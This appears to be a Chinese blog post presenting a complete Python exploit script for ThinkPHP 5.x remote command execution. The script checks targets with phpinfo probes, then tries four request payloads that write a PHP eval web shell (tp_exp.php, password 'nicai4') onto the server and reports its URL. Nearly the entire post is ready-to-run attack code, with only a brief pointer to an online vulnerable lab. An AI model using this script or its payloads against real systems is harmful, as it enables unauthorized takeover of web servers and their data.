python3编写ThinkPHP命令执行Getshell的方法

Python  /  管理员 发布于 8年前   254

加了三个验证漏洞以及四个getshell方法

# /usr/bin/env python3# -*- coding: utf-8 -*-# @Author: Morker# @Email: [email][email protected][/email]# @Blog:  [url]http://nsf.me/[/url] import requestsimport sys def demo():  print(' _______ _   _    _  _____ _  _ _____ ')  print(' |__  __| |  (_)   | | | __ \| | | | __ \ ')  print('  | | | |__ _ _ __ | | _| |__) | |__| | |__) |')  print('''  | | | '_ \| | '_ \| |/ / ___/| __ | ___/ ''')  print('  | | | | | | | | | |  <| |  | | | | |   ')  print('  |_| |_| |_|_|_| |_|_|\_\_|  |_| |_|_|   ')  print()  print('\tThinkPHP 5.x (v5.0.23 and v5.1.31 following version).')  print('\tRemote command execution exploit.')  print('\tVulnerability verification and getshell.')  print('\tTarget: http://target/public')  print()class ThinkPHP():  def __init__(self,web):    self.web = web    self.headers = {    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0",    "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",    "Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",    "Accept-Encoding" : "gzip, deflate",    "Content-Type" : "application/x-www-form-urlencoded",    "Connection" : "keep-alive"    }   def verification(self):    i = 0    s = 0    verifications = ['/?s=index/\\think\Request/input&filter=phpinfo&data=1','/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1','/?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1']    while True:      if i == len(verifications):        break      else:        url = self.web + verifications[i]        req = requests.get(url=url,headers=self.headers)        if 'phpinfo()' in req.text:          s = 1          break        else:          s = 0        i += 1    if s == 1:      print("[+] There are vulnerabilities.")      print()      toshell = input("[*] Getshell? (y/n):")      if toshell == 'y':        self.getshell()      elif toshell == 'n':        sys.exit()      else:        sys.exit()    else:      print("[-] There are no vulnerabilities.")   def getshell(self):    getshells = [    '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=tp_exp.php&vars[1][]=<?php @eval($_POST[nicai4]); ?>',    '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_POST[nicai4]);%20?>%27%20>>%20tp_exp.php',    '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval($_POST[nicai4]);%20?^>%20>>tp_exp.php',    '?s=index/\\think\\template\driver\\file/write&cacheFile=tp_exp.php&content=<?php%20eval($_POST[nicai4]);?>']    shell = self.web + '/tp_exp.php'    i = 0    s = 0    while True:      if i == len(getshells):        break      else:        url = self.web + getshells[i]        req = requests.get(url=url,headers=self.headers)        req_shell = requests.get(url=shell,headers=self.headers)        if req_shell.status_code == 200:          s = 1          break        else:          s = 0        i += 1    if s == 1:      print("[+] WebShell :%s PassWord :nicai4" % shell)    else:      print("[-] The vulnerability does not exist or exists waf.") def main():  demo()  url = input("[*] Please input your target: ")  run = ThinkPHP(url)  run.verification() if __name__ == '__main__':  main()

注：图中的测试网址为在线漏洞环境，可自己去在线搭建测试。

环境地址：https://www.vsplate.com/

效果图：

以上就是本文的全部内容，希望对大家的学习有所帮助，也希望大家多多支持。